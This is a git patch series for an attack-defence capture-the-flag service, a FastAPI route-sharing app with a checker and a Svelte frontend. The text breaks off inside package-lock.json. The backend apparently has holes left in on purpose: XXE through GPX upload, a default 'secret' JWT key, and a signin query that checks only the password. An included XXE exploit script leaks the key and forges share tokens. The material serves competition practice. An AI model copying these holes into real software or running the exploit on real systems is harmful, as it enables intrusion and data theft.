+JWT_KEY=secret +MONGO_URI=mongodb://mongodb:27017/explorers +``` \ No newline at end of file diff --git a/services/explorers/docker-compose.yml b/services/explorers/docker-compose.yml new file mode 100644 index 0000000..ebe8f59 --- /dev/null +++ b/services/explorers/docker-compose.yml @@ -0,0 +1,25 @@ +services: + app: + build: . + ports: + - "8000:8000" + restart: unless-stopped + + cpus: 2 + pids_limit: 256 + mem_limit: 1024m + environment: + - NUM_WORKERS=4 + + depends_on: + - mongodb + + + mongodb: + image: mongo:7.0.2 + volumes: + - dbdata:/data/db + restart: unless-stopped + +volumes: + dbdata: \ No newline at end of file diff --git a/services/explorers/src/app/__init__.py b/services/explorers/src/app/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/services/explorers/src/app/api.py b/services/explorers/src/app/api.py new file mode 100644 index 0000000..2bab195 --- /dev/null +++ b/services/explorers/src/app/api.py @@ -0,0 +1,187 @@ +from functools import lru_cache + +import fastapi +import gpxpy +from fastapi import APIRouter + +from app import auth, config, models, dto, serializers + +api = APIRouter() + + +@lru_cache() +def jwt_helper() -> auth.JWTHelper: + return auth.JWTHelper(config.get_settings().jwt_key) + + +async def get_current_user(request: fastapi.Request) -> str: + jwt_help = jwt_helper() + try: + api_token = request.cookies.get('Api-Token') or request.headers.get('X-Api-Token') + if api_token is None: + raise ValueError("Empty Api-Token/cookie") + user_data = jwt_help.decode_token(api_token.encode()) + except Exception as e: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_401_UNAUTHORIZED, + detail=json_error("Could not validate credentials"), + ) + + user_id = user_data.get('user_id') + return user_id + + +def gen_route_token(route_id: str) -> str: + return jwt_helper().gen_token({'route_id': route_id}) + + +def json_error(error): + return {'error': error} + + +def serialize_route(route): + route_dto = serializers.RouteSerializer.serialize(route) + route_dto.share_token = gen_route_token(f'{route.id}') + return route_dto + + +async def get_route_by_id(route_id) -> models.Route: + route = await models.Route.get(route_id) + if not route: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_404_NOT_FOUND, + detail=json_error('Route not found') + ) + return route + + +@api.post('/signup') +async def signup_handler(response: fastapi.Response, auth_req: dto.AuthRequest): + existing = await models.User.find(models.User.username == auth_req.username).first_or_none() + if existing: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_412_PRECONDITION_FAILED, + detail=json_error('user already exists') + ) + + user = models.User(username=auth_req.username, password=auth_req.password) + await user.insert() + + token = jwt_helper().gen_token({'user_id': f'{user.id}'}) + response.set_cookie("Api-Token", token) + return {'user_id': f'{user.id}', 'api_token': token} + + +@api.post('/signin') +async def signin_handler(response: fastapi.Response, auth_req: dto.AuthRequest): + user = await models.User.find( + models.User.username == auth_req.username and models.User.password == auth_req.password).first_or_none() + if not user: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_404_NOT_FOUND, + detail=json_error('user not found or invalid password') + ) + + token = jwt_helper().gen_token({'user_id': f'{user.id}'}) + response.set_cookie("Api-Token", token) + return {'user_id': f'{user.id}', 'api_token': token} + + +@api.post('/route/create') +async def route_create_handler(create_req: dto.CreateRouteRequest, user_id: str = fastapi.Depends(get_current_user)): + route = models.Route(title=create_req.title, + description=create_req.description, user_id=user_id, + track_points=[], waypoints=[]) + await route.insert() + + return serialize_route(route) + + +@api.get('/route/{route_id}') +async def route_get(route_id: str, user_id: str = fastapi.Depends(get_current_user), token: str | None = None): + route = await get_route_by_id(route_id) + + if token and jwt_helper().decode_token(token.encode()).get('route_id') == route_id: + return serialize_route(route) + + if route.user_id != user_id: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_403_FORBIDDEN, + detail=json_error('You are not allowed to view this route') + ) + + return serialize_route(route) + + +@api.post('/route/{route_id}/update') +async def update_route(route_id: str, update_req: dto.UpdateRouteRequest, + user_id: str = fastapi.Depends(get_current_user)): + route = await get_route_by_id(route_id) + if route.user_id != user_id: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_403_FORBIDDEN, + detail=json_error('You are not allowed to modify this route') + ) + + if update_req.title: + route.title = update_req.title + if update_req.description: + route.description = update_req.description + if update_req.waypoints: + route.waypoints = [serializers.WaypointSerializer.to_model(waypoint) for waypoint in update_req.waypoints] + if update_req.track_points: + route.track_points = [serializers.TrackPointSerializer.to_model(track_point) for track_point in + update_req.track_points] + + await route.save() + + return serialize_route(route) + + +@api.post('/route/{route_id}/upload') +async def route_upload(route_id: str, + file: fastapi.UploadFile, + user_id: str = fastapi.Depends(get_current_user)): + route = await get_route_by_id(route_id) + if route.user_id != user_id: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_403_FORBIDDEN, + detail=json_error('You are not allowed to modify this route') + ) + + try: + gpx = gpxpy.parse(file.file) + waypoints = [ + models.Waypoint( + lat=f'{waypoint.latitude}', + lon=f'{waypoint.longitude}', + ele=f'{waypoint.elevation}' if waypoint.elevation else None, + name=waypoint.name, + desc=waypoint.description, + comment=waypoint.comment, + sym=waypoint.symbol, + time=waypoint.time.isoformat() if waypoint.time else None, + ) + for waypoint in gpx.waypoints + ] + track_points = [ + models.TrackPoint( + lat=f'{point.latitude}', + lon=f'{point.longitude}', + ele=f'{point.elevation}' if point.elevation else None, + time=f'{point.time}', + ) + for track in gpx.tracks + for segment in track.segments + for point in segment.points + ] + route.waypoints = waypoints + route.track_points = track_points + await route.save() + except Exception as e: + raise fastapi.HTTPException( + status_code=fastapi.status.HTTP_500_INTERNAL_SERVER_ERROR, + detail=json_error(f'Could not parse GPX file') + ) + + return serialize_route(route) diff --git a/services/explorers/src/app/app.py b/services/explorers/src/app/app.py new file mode 100644 index 0000000..f77999a --- /dev/null +++ b/services/explorers/src/app/app.py @@ -0,0 +1,25 @@ +from fastapi import FastAPI +from starlette.requests import Request +from starlette.responses import JSONResponse + +from app.db import init_db +from app.api import api + +app = FastAPI() +from .config import get_settings + + +@app.on_event("startup") +async def start_db(): + await init_db(get_settings().mongo_uri) + + +@app.exception_handler(ValueError) +async def value_error_exception_handler(request: Request, exc: ValueError): + return JSONResponse( + status_code=400, + content={"error": str(exc)}, + ) + + +app.include_router(api, prefix="/api") diff --git a/services/explorers/src/app/auth.py b/services/explorers/src/app/auth.py new file mode 100644 index 0000000..e3a4261 --- /dev/null +++ b/services/explorers/src/app/auth.py @@ -0,0 +1,24 @@ +import logging + +import jwt + + +class JWTHelper(object): + ALGORITHM = "HS256" + + def __init__(self, security_key): + self.security_key = security_key + + def gen_token(self, data): + try: + return jwt.encode(data, self.security_key, algorithm=self.ALGORITHM) + except Exception as e: + logging.error("failed to generate jwt token: {}".format(e)) + return "" + + def decode_token(self, cookie): + try: + return jwt.decode(cookie, self.security_key, algorithms=[self.ALGORITHM, ]) + except Exception as e: + logging.error("failed to decode jwt token: {}".format(e)) + return None diff --git a/services/explorers/src/app/config.py b/services/explorers/src/app/config.py new file mode 100644 index 0000000..24be018 --- /dev/null +++ b/services/explorers/src/app/config.py @@ -0,0 +1,15 @@ +from functools import lru_cache + +from pydantic_settings import BaseSettings, SettingsConfigDict + + +class Settings(BaseSettings): + jwt_key: str = 'secret' + mongo_uri: str = 'mongodb://localhost:27017' + + model_config = SettingsConfigDict(env_file="app.env") + + +@lru_cache +def get_settings(): + return Settings() diff --git a/services/explorers/src/app/db.py b/services/explorers/src/app/db.py new file mode 100644 index 0000000..e6d22ab --- /dev/null +++ b/services/explorers/src/app/db.py @@ -0,0 +1,12 @@ +from beanie import init_beanie +import motor.motor_asyncio + +from app import models + + +async def init_db(mongo_uri): + client = motor.motor_asyncio.AsyncIOMotorClient( + mongo_uri + ) + + await init_beanie(database=client.db_name, document_models=[models.User, models.Route]) diff --git a/services/explorers/src/app/dto.py b/services/explorers/src/app/dto.py new file mode 100644 index 0000000..d7f48fd --- /dev/null +++ b/services/explorers/src/app/dto.py @@ -0,0 +1,48 @@ +from typing import Optional + +from pydantic import BaseModel, Field + + +class AuthRequest(BaseModel): + username: str + password: str + + +class CreateRouteRequest(BaseModel): + title: str + description: str + + +class TrackPoint(BaseModel): + lat: str + lon: str + ele: Optional[str] + time: Optional[str] + + +class Waypoint(BaseModel): + lat: str + lon: str + ele: Optional[str] + name: str + desc: Optional[str] + comment: Optional[str] + sym: Optional[str] + time: Optional[str] + + +class Route(BaseModel): + id: str + title: str + user_id: str + description: str + track_points: list[TrackPoint] + waypoints: list[Waypoint] + share_token: Optional[str] + + +class UpdateRouteRequest(BaseModel): + title: Optional[str] = None + description: Optional[str] = None + track_points: list[TrackPoint] + waypoints: list[Waypoint] diff --git a/services/explorers/src/app/models.py b/services/explorers/src/app/models.py new file mode 100644 index 0000000..0e11e92 --- /dev/null +++ b/services/explorers/src/app/models.py @@ -0,0 +1,40 @@ +import pydantic +from beanie import Document +from typing import Optional + + +class User(Document): + username: str + password: str + + class Settings: + name = "users" + + +class TrackPoint(pydantic.BaseModel): + lat: str + lon: str + ele: Optional[str] + time: Optional[str] + + +class Waypoint(pydantic.BaseModel): + lat: str + lon: str + ele: Optional[str] + name: str + desc: Optional[str] + comment: Optional[str] + sym: Optional[str] + time: Optional[str] + + +class Route(Document): + title: str + user_id: str + description: str + track_points: list[TrackPoint] + waypoints: list[Waypoint] + + class Settings: + name = "routes" diff --git a/services/explorers/src/app/serializers.py b/services/explorers/src/app/serializers.py new file mode 100644 index 0000000..96bf05d --- /dev/null +++ b/services/explorers/src/app/serializers.py @@ -0,0 +1,65 @@ +from app import models +from app import dto + + +class WaypointSerializer: + @staticmethod + def to_model(waypoint: dto.Waypoint) -> models.Waypoint: + return models.Waypoint( + lat=waypoint.lat, + sym=waypoint.sym, + lon=waypoint.lon, + ele=waypoint.ele, + name=waypoint.name, + desc=waypoint.desc, + comment=waypoint.comment, + time=waypoint.time, + ) + + @staticmethod + def serialize(waypoint: models.Waypoint) -> dto.Waypoint: + return dto.Waypoint( + lat=waypoint.lat, + sym=waypoint.sym, + lon=waypoint.lon, + ele=waypoint.ele, + name=waypoint.name, + desc=waypoint.desc, + comment=waypoint.comment, + time=waypoint.time, + ) + + +class TrackPointSerializer: + @staticmethod + def to_model(track_point: dto.TrackPoint) -> models.TrackPoint: + return models.TrackPoint( + lat=track_point.lat, + lon=track_point.lon, + ele=track_point.ele, + time=track_point.time, + ) + + @staticmethod + def serialize(track_point: models.TrackPoint) -> dto.TrackPoint: + return dto.TrackPoint( + lat=track_point.lat, + lon=track_point.lon, + ele=track_point.ele, + time=track_point.time, + ) + + +class RouteSerializer: + + @staticmethod + def serialize(route: models.Route): + return dto.Route( + id=f'{route.id}', + title=route.title, + user_id=route.user_id, + description=route.description, + track_points=[TrackPointSerializer.serialize(track_point) for track_point in route.track_points], + waypoints=[WaypointSerializer.serialize(waypoint) for waypoint in route.waypoints], + share_token=None, + ) diff --git a/services/explorers/src/main.py b/services/explorers/src/main.py new file mode 100644 index 0000000..a1708f4 --- /dev/null +++ b/services/explorers/src/main.py @@ -0,0 +1,17 @@ +import logging +import os +import sys + +import uvicorn + +if __name__ == "__main__": + root = logging.getLogger() + root.setLevel(logging.INFO) + + handler = logging.StreamHandler(sys.stderr) + handler.setLevel(logging.INFO) + formatter = logging.Formatter('%(levelname)s - %(message)s') + handler.setFormatter(formatter) + root.addHandler(handler) + uvicorn.run("app.app:app", port=8000, reload=False, access_log=True, host='0.0.0.0', + workers=int(os.getenv('NUM_WORKERS', '5'))) diff --git a/services/explorers/src/requirements.txt b/services/explorers/src/requirements.txt new file mode 100644 index 0000000..f015a87 --- /dev/null +++ b/services/explorers/src/requirements.txt @@ -0,0 +1,23 @@ +annotated-types==0.6.0 +anyio==3.7.1 +beanie==1.23.6 +gpxpy==1.6.1 +click==8.1.7 +dnspython==2.4.2 +fastapi==0.104.1 +h11==0.14.0 +idna==3.4 +lazy-model==0.2.0 +motor==3.3.1 +pydantic==2.5.0 +pydantic_core==2.14.1 +pydantic-settings==2.1.0 +PyJWT==2.8.0 +pymongo==4.6.0 +sniffio==1.3.0 +starlette==0.27.0 +toml==0.10.2 +python-multipart==0.0.6 +typing_extensions==4.8.0 +uvicorn==0.24.0.post1 +lxml==4.9.3 \ No newline at end of file diff --git a/sploits/explorers/xxe.py b/sploits/explorers/xxe.py new file mode 100644 index 0000000..01f748f --- /dev/null +++ b/sploits/explorers/xxe.py @@ -0,0 +1,64 @@ +import re +import jwt +import checklib +import sys + +import requests + +pld = ''' +]> + + +650.4 + +a +b +&test; + + + + +650 + + + +650.4 + + + + +''' + + +def leak_key(sess: requests.Session, host: str): + resp = sess.post(f'{host}/api/route/create', json={ + 'title': 'a', + 'description': 'b' + }) + assert resp.status_code == 200 + route_id = resp.json().get('id') + resp = sess.post(f'{host}/api/route/{route_id}/upload', files={ + 'file': pld + }) + key = re.findall(r"JWT_KEY=([A-Z\d]+)", resp.text) + assert len(key) == 1 + return key[0] + + +def pwn(ip: str, hint: str): + host = 'http://' + ip + ':8000' + + s = checklib.get_initialized_session() + u, p = checklib.rnd_username(), checklib.rnd_password() + s.post(host + '/api/signup', json={'username': u, 'password': p}) + + jwt_key = leak_key(s, host) + + token = jwt.encode({'route_id': hint}, jwt_key, algorithm='HS256') + + resp = s.get(host + '/api/route/' + hint, params={'token': token}) + print(resp.text, flush=True) + + +if __name__ == '__main__': + pwn(sys.argv[1], sys.argv[2]) From 3462fea16d5b96032fdbe8302f8263d9d1a06dac Mon Sep 17 00:00:00 2001 From: jnovikov Date: Sun, 19 Nov 2023 00:38:08 +0000 Subject: [PATCH 2/4] Explorers: MVP service ready (checker, backend, sploit). --- checkers/explorers/explorers_lib.py | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/checkers/explorers/explorers_lib.py b/checkers/explorers/explorers_lib.py index 8b4eaa3..a4bb57f 100644 --- a/checkers/explorers/explorers_lib.py +++ b/checkers/explorers/explorers_lib.py @@ -1,3 +1,5 @@ +from typing import Optional + import checklib from checklib import BaseChecker import requests @@ -44,7 +46,7 @@ def create_route(self, session: requests.Session, title: str, description: str): self.c.assert_eq(type(resp_json), dict, 'Failed to create route: invalid JSON') return resp_json - def get_route(self, session: requests.Session, route_id: str, token: str | None = None, + def get_route(self, session: requests.Session, route_id: str, token: Optional[str] = None, status: checklib.Status = checklib.Status.MUMBLE): params = {} if token: From 65ceb4711414fbcf1655ceba940ff00b9d1f6475 Mon Sep 17 00:00:00 2001 From: jnovikov Date: Wed, 6 Dec 2023 01:48:46 +0000 Subject: [PATCH 3/4] Explorers: add frontend, update the checker & minor API changes --- checkers/explorers/checker.py | 9 + checkers/explorers/explorers_lib.py | 7 + internal/explorers-front/.env.development | 1 + internal/explorers-front/.env.production | 1 + internal/explorers-front/.gitignore | 12 + internal/explorers-front/.npmrc | 1 + internal/explorers-front/README.md | 38 + internal/explorers-front/jsconfig.json | 18 + internal/explorers-front/package-lock.json | 1939 +++++++++++++++++ internal/explorers-front/package.json | 30 + internal/explorers-front/src/app.d.ts | 12 + internal/explorers-front/src/app.html | 12 + .../explorers-front/src/routes/+layout.js | 20 + .../explorers-front/src/routes/+layout.svelte | 43 + internal/explorers-front/src/routes/+page.js | 7 + .../explorers-front/src/routes/+page.svelte | 94 + .../src/routes/RouteList.svelte | 22 + .../src/routes/components/Map.svelte | 134 ++ .../src/routes/components/MarkerPopup.svelte | 55 + .../src/routes/create/+page.svelte | 80 + .../src/routes/logout/+page.svelte | 26 + .../src/routes/route/[slug]/+page.js | 28 + .../src/routes/route/[slug]/+page.svelte | 132 ++ .../src/routes/signin/+page.svelte | 84 + .../src/routes/signup/+page.svelte | 84 + .../explorers-front/src/routes/styles.css | 107 + internal/explorers-front/static/favicon.png | Bin 0 -> 9167 bytes internal/explorers-front/static/robots.txt | 3 + internal/explorers-front/svelte.config.js | 17 + internal/explorers-front/vite.config.js | 6 + services/explorers/conf/app.conf | 24 + services/explorers/docker-compose.yml | 13 +- .../_app/immutable/assets/0.f54ae1c3.css | 1 + .../immutable/assets/_layout.33736ff6.css | 1 + .../_app/immutable/assets/edit.cc61a753.png | Bin 0 -> 7996 bytes .../immutable/assets/file-upload.156694fe.png | Bin 0 -> 10940 bytes .../_app/immutable/assets/marker.884e7495.png | Bin 0 -> 16824 bytes .../_app/immutable/assets/share.f4c802a8.png | Bin 0 -> 15164 bytes .../_app/immutable/assets/world.bab3a2dd.png | Bin 0 -> 18533 bytes .../immutable/chunks/LockClosed.36d30438.js | 1 + .../_app/immutable/chunks/edit.a04a5399.js | 1 + .../_app/immutable/chunks/index.b942bf85.js | 1 + .../immutable/chunks/navigation.263462fb.js | 1 + .../immutable/chunks/navigation.872e8737.js | 1 + .../_app/immutable/chunks/public.550f299c.js | 1 + .../_app/immutable/chunks/public.aa8ed6af.js | 1 + .../immutable/chunks/scheduler.1f572272.js | 1 + .../immutable/chunks/singletons.1951defa.js | 1 + .../immutable/chunks/singletons.27fcd387.js | 1 + .../_app/immutable/chunks/spread.84d39b6c.js | 1 + .../_app/immutable/entry/app.d3ff049c.js | 1 + .../_app/immutable/entry/app.dbc8624c.js | 1 + .../_app/immutable/entry/start.06157553.js | 3 + .../_app/immutable/entry/start.deee71d0.js | 3 + .../build/_app/immutable/nodes/0.67d342ee.js | 1 + .../build/_app/immutable/nodes/0.901c8284.js | 1 + .../build/_app/immutable/nodes/1.27d5f0f3.js | 1 + .../build/_app/immutable/nodes/1.2db1d768.js | 1 + .../build/_app/immutable/nodes/2.bf5bf864.js | 1 + .../build/_app/immutable/nodes/2.f4d2973c.js | 1 + .../build/_app/immutable/nodes/3.04c11af8.js | 1 + .../build/_app/immutable/nodes/3.aead1a15.js | 1 + .../build/_app/immutable/nodes/4.36dc01d5.js | 1 + .../build/_app/immutable/nodes/4.88689da1.js | 1 + .../build/_app/immutable/nodes/5.4eb24c8c.js | 15 + .../build/_app/immutable/nodes/5.bfc246c8.js | 15 + .../build/_app/immutable/nodes/6.85392252.js | 1 + .../build/_app/immutable/nodes/6.99c00b50.js | 1 + .../build/_app/immutable/nodes/7.046c891e.js | 1 + .../build/_app/immutable/nodes/7.1ca30cae.js | 1 + .../explorers/front/build/_app/version.json | 1 + services/explorers/front/build/favicon.png | Bin 0 -> 9167 bytes services/explorers/front/build/index.html | 35 + services/explorers/front/build/robots.txt | 3 + services/explorers/src/app/api.py | 29 + services/explorers/src/app/dto.py | 5 + services/explorers/src/app/serializers.py | 9 + 77 files changed, 3204 insertions(+), 2 deletions(-) create mode 100644 internal/explorers-front/.env.development create mode 100644 internal/explorers-front/.env.production create mode 100644 internal/explorers-front/.gitignore create mode 100644 internal/explorers-front/.npmrc create mode 100644 internal/explorers-front/README.md create mode 100644 internal/explorers-front/jsconfig.json create mode 100644 internal/explorers-front/package-lock.json create mode 100644 internal/explorers-front/package.json create mode 100644 internal/explorers-front/src/app.d.ts create mode 100644 internal/explorers-front/src/app.html create mode 100644 internal/explorers-front/src/routes/+layout.js create mode 100644 internal/explorers-front/src/routes/+layout.svelte create mode 100644 internal/explorers-front/src/routes/+page.js create mode 100644 internal/explorers-front/src/routes/+page.svelte create mode 100644 internal/explorers-front/src/routes/RouteList.svelte create mode 100644 internal/explorers-front/src/routes/components/Map.svelte create mode 100644 internal/explorers-front/src/routes/components/MarkerPopup.svelte create mode 100644 internal/explorers-front/src/routes/create/+page.svelte create mode 100644 internal/explorers-front/src/routes/logout/+page.svelte create mode 100644 internal/explorers-front/src/routes/route/[slug]/+page.js create mode 100644 internal/explorers-front/src/routes/route/[slug]/+page.svelte create mode 100644 internal/explorers-front/src/routes/signin/+page.svelte create mode 100644 internal/explorers-front/src/routes/signup/+page.svelte create mode 100644 internal/explorers-front/src/routes/styles.css create mode 100644 internal/explorers-front/static/favicon.png create mode 100644 internal/explorers-front/static/robots.txt create mode 100644 internal/explorers-front/svelte.config.js create mode 100644 internal/explorers-front/vite.config.js create mode 100644 services/explorers/conf/app.conf create mode 100644 services/explorers/front/build/_app/immutable/assets/0.f54ae1c3.css create mode 100644 services/explorers/front/build/_app/immutable/assets/_layout.33736ff6.css create mode 100644 services/explorers/front/build/_app/immutable/assets/edit.cc61a753.png create mode 100644 services/explorers/front/build/_app/immutable/assets/file-upload.156694fe.png create mode 100644 services/explorers/front/build/_app/immutable/assets/marker.884e7495.png create mode 100644 services/explorers/front/build/_app/immutable/assets/share.f4c802a8.png create mode 100644 services/explorers/front/build/_app/immutable/assets/world.bab3a2dd.png create mode 100644 services/explorers/front/build/_app/immutable/chunks/LockClosed.36d30438.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/edit.a04a5399.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/index.b942bf85.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/navigation.263462fb.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/navigation.872e8737.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/public.550f299c.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/public.aa8ed6af.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/scheduler.1f572272.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/singletons.1951defa.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/singletons.27fcd387.js create mode 100644 services/explorers/front/build/_app/immutable/chunks/spread.84d39b6c.js create mode 100644 services/explorers/front/build/_app/immutable/entry/app.d3ff049c.js create mode 100644 services/explorers/front/build/_app/immutable/entry/app.dbc8624c.js create mode 100644 services/explorers/front/build/_app/immutable/entry/start.06157553.js create mode 100644 services/explorers/front/build/_app/immutable/entry/start.deee71d0.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/0.67d342ee.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/0.901c8284.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/1.27d5f0f3.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/1.2db1d768.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/2.bf5bf864.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/2.f4d2973c.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/3.04c11af8.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/3.aead1a15.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/4.36dc01d5.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/4.88689da1.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/5.4eb24c8c.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/5.bfc246c8.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/6.85392252.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/6.99c00b50.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/7.046c891e.js create mode 100644 services/explorers/front/build/_app/immutable/nodes/7.1ca30cae.js create mode 100644 services/explorers/front/build/_app/version.json create mode 100644 services/explorers/front/build/favicon.png create mode 100644 services/explorers/front/build/index.html create mode 100644 services/explorers/front/build/robots.txt diff --git a/checkers/explorers/checker.py b/checkers/explorers/checker.py index a6e3b98..c618043 100755 --- a/checkers/explorers/checker.py +++ b/checkers/explorers/checker.py @@ -66,6 +66,11 @@ def check(self): self.assert_eq(route.get('title'), random_name, 'Failed to create route') self.assert_eq(route.get('description'), random_description, 'Failed to create route') + route_list = self.lib.get_route_list(session) + self.assert_eq(len(route_list), 1, 'Failed to get route list') + self.assert_eq(route_list[0].get('title'), random_name, 'Failed to get route list') + self.assert_eq(route_list[0].get('description'), random_description, 'Failed to get route list') + wpts = [ gpxhelper.WaypointParams( name='Oil found', @@ -168,6 +173,10 @@ def get(self, flag_id: str, flag: str, vuln: str): route = self.lib.get_route(sess, route_id, status=Status.CORRUPT) self.assert_eq(route.get('description'), flag, 'Failed to get route', status=Status.CORRUPT) + route_list = self.lib.get_route_list(sess, status=Status.CORRUPT) + self.assert_in(flag, [x.get('description') for x in route_list], 'Failed to get route list', + status=Status.CORRUPT) + u, p = rnd_username(), rnd_password() new_sess = self.session_with_req_ua() self.lib.signup(new_sess, u, p) diff --git a/checkers/explorers/explorers_lib.py b/checkers/explorers/explorers_lib.py index a4bb57f..667b4cd 100644 --- a/checkers/explorers/explorers_lib.py +++ b/checkers/explorers/explorers_lib.py @@ -46,6 +46,13 @@ def create_route(self, session: requests.Session, title: str, description: str): self.c.assert_eq(type(resp_json), dict, 'Failed to create route: invalid JSON') return resp_json + def get_route_list(self, session: requests.Session, status: checklib.Status = checklib.Status.MUMBLE): + resp = session.get(f'{self.api_url}/route') + self.c.assert_eq(resp.status_code, 200, 'Failed to get route list', status=status) + resp_json = self.c.get_json(resp, 'Failed to get route list: invalid JSON') + self.c.assert_eq(type(resp_json), list, 'Failed to get route list: invalid JSON') + return resp_json + def get_route(self, session: requests.Session, route_id: str, token: Optional[str] = None, status: checklib.Status = checklib.Status.MUMBLE): params = {} diff --git a/internal/explorers-front/.env.development b/internal/explorers-front/.env.development new file mode 100644 index 0000000..2615a21 --- /dev/null +++ b/internal/explorers-front/.env.development @@ -0,0 +1 @@ +PUBLIC_BASE_URL="http://127.0.0.1:8000/api" \ No newline at end of file diff --git a/internal/explorers-front/.env.production b/internal/explorers-front/.env.production new file mode 100644 index 0000000..b3fa440 --- /dev/null +++ b/internal/explorers-front/.env.production @@ -0,0 +1 @@ +PUBLIC_BASE_URL="/api" \ No newline at end of file diff --git a/internal/explorers-front/.gitignore b/internal/explorers-front/.gitignore new file mode 100644 index 0000000..8f6c617 --- /dev/null +++ b/internal/explorers-front/.gitignore @@ -0,0 +1,12 @@ +.DS_Store +node_modules +/build +/.svelte-kit +/package +.env +.env.* +!.env.example +.vercel +.output +vite.config.js.timestamp-* +vite.config.ts.timestamp-* diff --git a/internal/explorers-front/.npmrc b/internal/explorers-front/.npmrc new file mode 100644 index 0000000..b6f27f1 --- /dev/null +++ b/internal/explorers-front/.npmrc @@ -0,0 +1 @@ +engine-strict=true diff --git a/internal/explorers-front/README.md b/internal/explorers-front/README.md new file mode 100644 index 0000000..5c91169 --- /dev/null +++ b/internal/explorers-front/README.md @@ -0,0 +1,38 @@ +# create-svelte + +Everything you need to build a Svelte project, powered by [`create-svelte`](https://github.com/sveltejs/kit/tree/master/packages/create-svelte). + +## Creating a project + +If you're seeing this, you've probably already done this step. Congrats! + +```bash +# create a new project in the current directory +npm create svelte@latest + +# create a new project in my-app +npm create svelte@latest my-app +``` + +## Developing + +Once you've created a project and installed dependencies with `npm install` (or `pnpm install` or `yarn`), start a development server: + +```bash +npm run dev + +# or start the server and open the app in a new browser tab +npm run dev -- --open +``` + +## Building + +To create a production version of your app: + +```bash +npm run build +``` + +You can preview the production build with `npm run preview`. + +> To deploy your app, you may need to install an [adapter](https://kit.svelte.dev/docs/adapters) for your target environment. diff --git a/internal/explorers-front/jsconfig.json b/internal/explorers-front/jsconfig.json new file mode 100644 index 0000000..81def15 --- /dev/null +++ b/internal/explorers-front/jsconfig.json @@ -0,0 +1,18 @@ +{ + "extends": "./.svelte-kit/tsconfig.json", + "compilerOptions": { + "allowJs": true, + "checkJs": true, + "esModuleInterop": true, + "forceConsistentCasingInFileNames": true, + "resolveJsonModule": true, + "skipLibCheck": true, + "sourceMap": true, + "strict": true, + "moduleResolution": "bundler" + } + // Path aliases are handled by https://kit.svelte.dev/docs/configuration#alias and https://kit.svelte.dev/docs/configuration#files + // + // If you want to overwrite includes/excludes, make sure to copy over the relevant includes/excludes + // from the referenced tsconfig.json - TypeScript does not merge them in +} diff --git a/internal/explorers-front/package-lock.json b/internal/explorers-front/package-lock.json new file mode 100644 index 0000000..c05e69a --- /dev/null +++ b/internal/explorers-front/package-lock.json @@ -0,0 +1,1939 @@ +{ + "name": "explorers-front", + "version": "0.0.1", + "lockfileVersion": 3, + "requires": true, + "packages": { + "": { + "name": "explorers-front", + "version": "0.0.1", + "dependencies": { + "@sveltejs/adapter-static": "^2.0.3", + "bulma": "^0.9.4", + "leaflet": "^1.9.4" + }, + "devDependencies": { + "@fontsource/fira-mono": "^4.5.10", + "@neoconfetti/svelte": "^1.0.0", + "@sveltejs/adapter-auto": "^2.0.0", + "@sveltejs/kit": "^1.27.4", + "@types/cookie": "^0.5.1", + "autoprefixer": "^10.4.16", + "svelte": "^4.0.5", + "svelte-check": "^3.6.0", + "svelte-ionicons": "^0.7.2", + "typescript": "^5.0.0", + "vite": "^4.4.2" + } + }, + "node_modules/@ampproject/remapping": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/@ampproject/remapping/-/remapping-2.2.1.tgz", + "integrity": "sha512-lFMjJTrFL3j7L9yBxwYfCq2k6qqwHyzuUl/XBnif78PWTJYyL/dfowQHWE3sp6U6ZzqWiiIZnpTMO96zhkjwtg==", + "dependencies": { + "@jridgewell/gen-mapping": "^0.3.0", + "@jridgewell/trace-mapping": "^0.3.9" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/@esbuild/android-arm": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm/-/android-arm-0.18.20.tgz", + "integrity": "sha512-fyi7TDI/ijKKNZTUJAQqiG5T7YjJXgnzkURqmGj13C6dCqckZBLdl4h7bkhHt/t0WP+zO9/zwroDvANaOqO5Sw==", + "cpu": [ + "arm" + ], + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-arm64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/android-arm64/-/android-arm64-0.18.20.tgz", + "integrity": "sha512-Nz4rJcchGDtENV0eMKUNa6L12zz2zBDXuhj/Vjh18zGqB44Bi7MBMSXjgunJgjRhCmKOjnPuZp4Mb6OKqtMHLQ==", + "cpu": [ + "arm64" + ], + "optional": true, + "os": [ + "android" + ], + "engines": { + "node": ">=12" + } + }, + "node_modules/@esbuild/android-x64": { + "version": "0.18.20", + "resolved": "https://registry.npmjs.org/@esbuild/android-x64/-/android-x64-0.18.20.tgz", + 